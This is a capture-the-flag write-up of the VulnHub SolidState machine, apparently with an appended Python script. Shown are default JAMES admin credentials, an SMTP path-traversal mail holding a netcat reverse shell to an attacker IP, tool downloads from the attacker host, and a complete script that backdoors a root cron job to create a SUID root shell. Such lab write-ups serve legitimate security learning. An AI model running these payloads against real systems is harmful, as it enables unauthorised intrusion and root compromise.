VulnHub: SOLIDSTATE: 1

Link: https://www.vulnhub.com/entry/solidstate-1,261/

1. Network Discovery

2. Port scan

nmap -Pn -p1000- 10.0.2.25

3. OS and service scan

4. Vuln scan

5. Starting w/ port 80

Nikto

Directory scan

Access the site

View page source, nothing

services.html

Try XSS, but nothing happened.

Maybe some username?

6. Next one is port 25: Apache JAMES smtpd 2.3.2.

I came across this guide

The JAMES Remote Administration Tool (port 4555) still accepts its default credentials:

Username: root
Password: root

I changed every user's password through the admin tool (setpassword).

Accessed these accounts via the POP3 service on port 110 using Thunderbird.

John: there’s a message

Mindy: there are 2 messages.

One of them gives me Mindy's username and password to log in over SSH.

7. Log in with Mindy's credentials

cat user.txt

Try exploring the system

Restricted

Read /etc/passwd

I'm restricted by rbash and cannot do much.

8. JAMES 2.3.2: back to the exploitation guide

Follow the guide. It first adds a JAMES user named with the traversal path via the admin tool, so that mail for that recipient is written as a file under /etc/bash_completion.d.

I have to supply the reverse-shell command.

Prepare listener on port 443

Connect to port 25

Following the guide and a reverse-shell cheat sheet:

MAIL FROM: <'you@domain.com>
RCPT TO: <../../../../../../../../etc/bash_completion.d>
DATA
From: bla.bla
'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.2.27 443 >/tmp/f
.

Log in as Mindy again. Bash sources the dropped file from /etc/bash_completion.d at login, so you will see some weird output from the mail headers before the payload runs.

Back to listener, now I have a shell

9. Privilege escalation

I need a TTY shell.

I want to run LinEnum.sh

Prepare SimpleHTTPServer on attacker machine

Download the script

wget http://10.0.2.27/LinEnum.sh

Change permissions and run

/tmp/LinEnum.sh -t

The machine is 32-bit.

There's /opt/tmp.py -> very interesting

Cannot do anything with these files

Nothing on SUID/SGID

Nothing on cron

Check sudo

Nothing usable

Verify capabilities

Let's check running services besides the cron jobs

I found 'cron -f'. Something must be running in the background.

Observe the system with pspy

This machine is 32-bit, so I download pspy32 to the machine.

chmod 777 pspy32
/tmp/pspy32

(chmod +x would be enough; the file does not need to be world-writable.)

After waiting a while, pspy shows root's cron job executing /opt/tmp.py.

Read the file.

cat tmp.py

The script runs as root from cron and is writable, so I can append a line that creates a SUID root shell. Check the file again afterwards:

cat tmp.py

Waiting for a while

ls -la

Now I got /tmp/rootbash

Run it (a SUID copy of bash needs -p, otherwise it drops the elevated effective UID)

whoami

Now I’m root

Get root.txt

ls -la
cat root.txt
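The writable-cron-script escalation from step 9, as an added example and not the author's own command: the script path, the drop location and the statement appended are assumptions chosen to match what the write-up observed (root's cron running /opt/tmp.py and /tmp/rootbash appearing afterwards). The dry_run helper rehearses the same logic on a scratch file you own, so the check can be tested without root.

```python
"""Abuse a root cron job's writable script, as with /opt/tmp.py above."""
import os
import stat
import time

TARGET_SCRIPT = "/opt/tmp.py"   # assumption: script pspy showed root running
ROOTBASH = "/tmp/rootbash"      # assumption: where the SUID bash will appear


def backdoor_line(dest=ROOTBASH):
    """One Python statement: copy bash and set the SUID bit so it keeps root."""
    return f'import os; os.system("cp /bin/bash {dest}; chmod 4755 {dest}")'


def is_abusable(path, privileged_uid=0):
    """True when the file belongs to the privileged user (root by default)
    yet is writable by us: the condition that turns a cron job into a
    privilege-escalation path."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return False
    return st.st_uid == privileged_uid and os.access(path, os.W_OK)


def append_line(path, line):
    """Append on its own line so the existing script still parses and runs."""
    with open(path, "a") as fh:
        fh.write("\n" + line + "\n")


def has_suid(path):
    """True once the SUID bit is set on path (i.e. cron has run our line)."""
    try:
        return bool(os.stat(path).st_mode & stat.S_ISUID)
    except FileNotFoundError:
        return False


def wait_for_rootbash(dest=ROOTBASH, timeout=300):
    """Poll until the cron job has executed the modified script."""
    deadline = time.time() + timeout
    while time.time() < deadline:
        if has_suid(dest):
            return True
        time.sleep(5)
    return False


def dry_run(scratch_path):
    """Rehearse on a file we own: same checks and append, no root needed."""
    with open(scratch_path, "w") as fh:
        fh.write("print('cron job')\n")
    if not is_abusable(scratch_path, privileged_uid=os.getuid()):
        return False
    append_line(scratch_path, backdoor_line())
    with open(scratch_path) as fh:
        return fh.read().rstrip().endswith(backdoor_line())


if __name__ == "__main__":
    if not is_abusable(TARGET_SCRIPT):
        raise SystemExit(f"{TARGET_SCRIPT} is not root-owned and writable")
    append_line(TARGET_SCRIPT, backdoor_line())
    if wait_for_rootbash():
        print(f"{ROOTBASH} is ready; run it with -p so bash keeps euid 0")
```

Once the SUID copy exists, start it as /tmp/rootbash -p: without -p, bash notices that the effective UID differs from the real one and drops the privilege before the prompt appears.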